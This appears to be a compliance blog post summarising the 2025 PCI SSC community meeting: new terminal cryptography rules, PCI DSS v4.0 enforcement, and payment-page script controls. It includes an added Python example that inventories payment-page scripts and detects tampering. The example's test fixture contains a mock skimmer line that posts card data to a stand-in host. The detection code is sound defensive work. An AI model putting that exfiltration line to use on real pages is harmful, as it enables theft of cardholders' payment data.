Key Takeaways
The 2025 PCI Security Standards Council (PCI SSC) North America Community Meeting in Fort Worth, Texas, marked a transition from years of planning around PCI DSS v4.0 and v4.0.1 to immediate operational challenges, security enforcement, cryptographic modernization, and governance of emerging technologies. Discussions centered on persistent implementation struggles and a broader evolution from checklist compliance toward continuous, risk-based security management.
Modernizing payment terminal and transaction standards
A key focus was modernizing standards for the physical payment ecosystem as device innovation and cryptographic threats accelerate. The release of PCI PTS POI Modular Security Requirements v7.0 introduced major technical and design changes for manufacturers, signaling a full break from legacy cryptographic algorithms and the protocols built on them.
Cryptographic acceleration and obsolescence
Version 7.0 requires cryptography of at least 128-bit security strength for all terminal security functions, including firmware authentication and tamper-detection mechanisms, and prohibits the use of any TDES (Triple DES) keys. This accelerates cryptographic deprecation across the POI market, requiring hardware and firmware redesigns built on AES and other modern algorithms. Although PCI extended the expiration date of POI v5-approved devices earlier in 2025, that relief does not alter the long-term move toward stronger cryptography.
Biometrics and cardholder verification
V7.0 introduces formal evaluation requirements for biometric readers used for Cardholder Verification Method (CVM). Controls now mandate secure capture and processing of biometric data, enabling the next generation of frictionless authentication while maintaining strict privacy and integrity protections.
Controlling functionality creep in smart terminals
The standard also addresses risks posed by multifunction smart terminals that support non-payment applications. PTS POI v7.0 allows the integration of third-party apps (loyalty programs or advertising) only under strict isolation requirements. These rules ensure that non-payment apps cannot access payment input channels or plaintext data, reducing supply chain and malware risks across device ecosystems.
PCI DSS v4.0: Industry struggles and compliance shifts
The March 2025 enforcement of future-dated PCI DSS v4.0 requirements has proven challenging. Survey data presented at the meeting showed that 64% of organizations cite rising complexity, particularly around documentation, MFA, and encryption, as major hurdles, with just 32% feeling fully ready.
Six months into enforcement, the Council’s discussions focused on closing widening compliance gaps and transitioning organizations from “best practice” to fully auditable compliance across four major control areas:
- Expanded multi-factor authentication (MFA): MFA now applies to all access into the Cardholder Data Environment (CDE), not just administrative users. This expansion includes vendors and contractors, increasing implementation complexity and cost.
- Automated logging and review: Requirement 10.4.1.1 requires automated mechanisms to perform the daily audit log reviews, so purely manual review no longer satisfies the standard; this is driving widespread adoption of SIEM systems for correlation and alerting.
- Proactive phishing defense: Organizations must detect and prevent advanced phishing attacks targeting system-access personnel.
- Account hygiene: Requirement 7.2.4 requires all user accounts and related access privileges, including third-party and vendor accounts, to be reviewed at least once every six months, with the review documented.
Confusion around requirements 6.4.3 and 11.6.1
Persistent confusion continues around two new requirements, 6.4.3 and 11.6.1, both aimed at the payment page itself and both extended in v4.0 to e-commerce merchants traditionally considered low risk under SAQ A.
- Requirement 11.6.1 – Web skimming prevention: Entities must deploy a change- and tamper-detection mechanism that alerts on unauthorized modification of the HTTP headers and script content of payment pages as received by the consumer browser, the footprint of skimming or Magecart-style attacks. The requirement sets a minimum frequency of at least once every seven days (or as defined by the entity's targeted risk analysis), although many deployments monitor continuously. This is harder for smaller merchants lacking internal security infrastructure.
- Requirement 6.4.3 – Payment page script management: Every script loaded and executed in the consumer's browser on a payment page must be authorized, inventoried with a written justification for why it is needed, and integrity-assured so that unauthorized changes are detected. Maintaining that inventory across third-party tags, tag managers, and legacy code is difficult for small organizations, highlighting the widening gap between enterprise and SMB capabilities.
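To make the two requirements concrete, the following is an added example (not from the page or from PCI SSC) of the check a merchant would run: it builds the 6.4.3 script inventory of a payment page, then audits a later fetch of the same page against that inventory and a last-known-good baseline, which is the core of an 11.6.1 change-detection mechanism. It assumes the page HTML is fetched separately and passed in as a string; the URLs, script bodies, SRI hash and justification strings are constructed for the demo and are not real.

```python
"""Payment-page script inventory (PCI DSS 6.4.3) and change detection (11.6.1).

Added example, not the page's or PCI SSC's code. Assumptions: the payment
page HTML is fetched by something else and handed in as a string; the
approved script list and the last-known-good baseline live in a store of
your choosing and are passed in as dicts. All sample data is constructed.
"""
import hashlib
from html.parser import HTMLParser


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


class _ScriptCollector(HTMLParser):
    """Collect every <script> on a page as {identity: (kind, fingerprint)}.

    External scripts are identified by their src and fingerprinted by their
    SRI integrity attribute (None if absent). Inline scripts are identified
    and fingerprinted by the SHA-256 of their body, the same value a CSP
    hash-source would carry.
    """

    def __init__(self):
        super().__init__()
        self.scripts = {}
        self._inline = None  # buffer while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts[a["src"]] = ("external", a.get("integrity"))
        else:
            self._inline = []

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            digest = sha256_hex("".join(self._inline).strip())
            self.scripts["sha256-" + digest] = ("inline", digest)
            self._inline = None


def inventory(html: str) -> dict:
    """Return {identity: (kind, fingerprint)} for all scripts on the page."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    return p.scripts


def audit(html: str, authorized: dict, baseline: dict) -> dict:
    """Check a fetched page against the approved inventory and the baseline.

    authorized: {identity: written justification}  (the 6.4.3 inventory)
    baseline:   inventory() of the last approved page version (11.6.1)
    """
    current = inventory(html)
    return {
        # loaded on the page but never approved: the injected-skimmer case
        "unauthorized": sorted(i for i in current if i not in authorized),
        # approved external script whose integrity attribute changed or vanished
        "changed": sorted(i for i in current
                          if i in baseline and baseline[i] != current[i]),
        # approved script no longer present (an edited inline script shows up
        # here as its old hash, and under "unauthorized" as its new hash)
        "missing": sorted(i for i in baseline if i not in current),
        # external scripts loaded with no integrity assurance at all
        "no_integrity": sorted(i for i, (kind, fp) in current.items()
                               if kind == "external" and fp is None),
    }


# --- constructed sample data (hypothetical hosts, hashes and tickets) -------
CHECKOUT_JS = "document.getElementById('pay').addEventListener('submit', submitCard);"

APPROVED_PAGE = f"""<html><body>
<form id="pay"></form>
<script src="https://pay.example.com/psp.js" integrity="sha384-AAAAAAAA"></script>
<script>{CHECKOUT_JS}</script>
</body></html>"""

# Same page after a hypothetical skimmer injection: one new external script,
# the inline handler edited to exfiltrate, and the PSP script's SRI dropped.
TAMPERED_PAGE = f"""<html><body>
<form id="pay"></form>
<script src="https://pay.example.com/psp.js"></script>
<script>{CHECKOUT_JS} fetch('https://cdn.example.net/a', {{method:'POST', body:cardData}});</script>
<script src="https://cdn.example.net/analytics.js"></script>
</body></html>"""

AUTHORIZED = {
    "https://pay.example.com/psp.js": "Payment service provider SDK, contract on file",
    "sha256-" + sha256_hex(CHECKOUT_JS): "First-party checkout handler, change ticket PAY-1",
}

if __name__ == "__main__":
    baseline = inventory(APPROVED_PAGE)
    print("approved page:", audit(APPROVED_PAGE, AUTHORIZED, baseline))
    print("tampered page:", audit(TAMPERED_PAGE, AUTHORIZED, baseline))
```

Run against the approved page every list comes back empty; against the tampered page the audit flags the injected analytics.js as unauthorized, the edited inline handler as a new unapproved hash plus a missing approved hash, and psp.js as both changed and lacking integrity. Two caveats a practitioner should keep in mind: a server-side fetch only sees what the server serves, so a skimmer that injects itself conditionally (by client fingerprint or geography) or lives inside an already-approved third-party script is not caught this way, which is why browser-side integrity controls such as CSP hash-sources and SRI, and in-browser monitoring, are normally layered on top; and an SRI attribute only helps if the browser actually enforces it, so the 6.4.3 inventory should also record where each integrity value was obtained.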
Escalating threats: Supply chain and ransomware
The meeting’s threat intelligence sessions underscored the rise of ransomware-as-a-service and supply chain compromises. Attackers increasingly target third-party providers to propagate ransomware through legitimate updates, APIs, or software libraries.
Organizations must shift toward continuous monitoring of suppliers, require Software Bills of Materials (SBOMs), and maintain evidence of active control validation. Incident response planning must now explicitly address vendor compromise and cyber extortion scenarios. The Council emphasized defining a Minimum Viable Business recovery state, identifying critical assets, and conducting tabletop exercises simulating third-party and ransomware incidents to test decision-making structures under pressure.
Cloud security, APIs, and scope reduction
Extensive sessions focused on PCI DSS v4.0 implementation in cloud and API-driven environments. As payment ecosystems become modular and distributed, scope reduction has emerged as the most pragmatic compliance strategy.
Tokenization and P2PE
Tokenization remains the leading scope-reduction method (used by 74% of organizations). Similarly, Point-to-Point Encryption (P2PE) secures card data immediately upon capture, minimizing PCI DSS scope and risk exposure.
Architectural decoupling as a compliance strategy
The challenges of implementing controls like 6.4.3 and 11.6.1 validate the strategy of removing sensitive data from the environment altogether. Tokenization and validated P2PE allow organizations to focus investment on a smaller, more defensible footprint.
Key strategic themes and takeaways
- Risk-based evolution: PCI DSS 4.0 shifts from periodic audits to continuous risk management.
- Device security modernization: POI v7.0 prohibits TDES, requires 128-bit-strength cryptography such as AES, and formally evaluates biometric CVM readers.
- Operational maturity: Automation and MFA for all access, and documented account reviews illustrate the growing expectation of operational discipline rather than a compliance checkbox.
- Merchant burden awareness: PCI recognizes the challenges faced by smaller merchants and indicated potential guidance to simplify implementation for those deemed “low risk”.
- Third-party governance: Continuous monitoring and SBOMs are key to supply chain defense.
- Scope reduction as strategy: Tokenization and encryption remain the most efficient compliance tools.
The future of payment security
The central message from the 2025 PCI SSC meeting is clear: the future of payment security lies in continuous, risk-based compliance. PCI DSS adherence can no longer be an annual checkbox exercise; it must be an ongoing, intelligence-driven process integrated into every layer of the payment ecosystem.
To learn how our team can help you build a strong PCI DSS strategy, visit our compliance resources.